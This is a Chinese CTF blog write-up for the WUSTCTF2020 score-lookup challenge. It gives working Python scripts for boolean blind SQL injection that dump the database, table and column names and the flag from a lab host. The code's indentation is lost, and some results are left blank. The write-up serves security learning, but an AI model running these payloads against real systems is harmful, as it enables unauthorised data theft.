你爹刷题5
[WUSTCTF2020]颜值成绩查询
你👱🏻点进题目就看到这个
输入1试试
得到1伯昏
数字最多只能输到4
试了一下很明显是sql注入题目,试试异或1^1^1
插入sql语句
1^(ascii(substr((select(database())),1,1))>200)^1
大于200就查询不到了,明显是布尔盲注
0^1会出现1的内容
爆库名
import requests
import time
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i, mid)
r = requests.get(url + payload)
time.sleep(0.3)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
库名为ctf
爆表
import requests
import time
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
# payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (
i, mid)
r = requests.get(url + payload)
time.sleep(0.3)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
表名为
爆列名
import requests
import time
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn//?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
# payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
# payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (
i, mid)
r = requests.get(url + payload)
time.sleep(0.3)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
列名为
爆字段
import requests
import time
url="http://e28bbc98- c8fb-4f48-8165-50f458b0ac6b.node4.buuoj.cn:81/?stunum="
name=''
for i in range(1,100):
print(i)
low=32
high=128
mid=(low+high)//2
while low<high:
#payload = "0^(ascii(substr((select(database())),%d,1))>%d)" % (i, mid)
#payload="0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),%d,1))>%d)"%(i,mid)
#payload="0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)"%(i,mid)
payload="0^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)"%(i,mid)
r=requests.get(url=url+payload)
time.sleep(0.3)
#print(r.text)
if 'admin' in r.text:
low = mid+1
else:
high=mid
mid=(low+high)//2
if(mid==32):
break
name=name+chr(mid)
print (name)
得到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 吴豪滨的地宫!
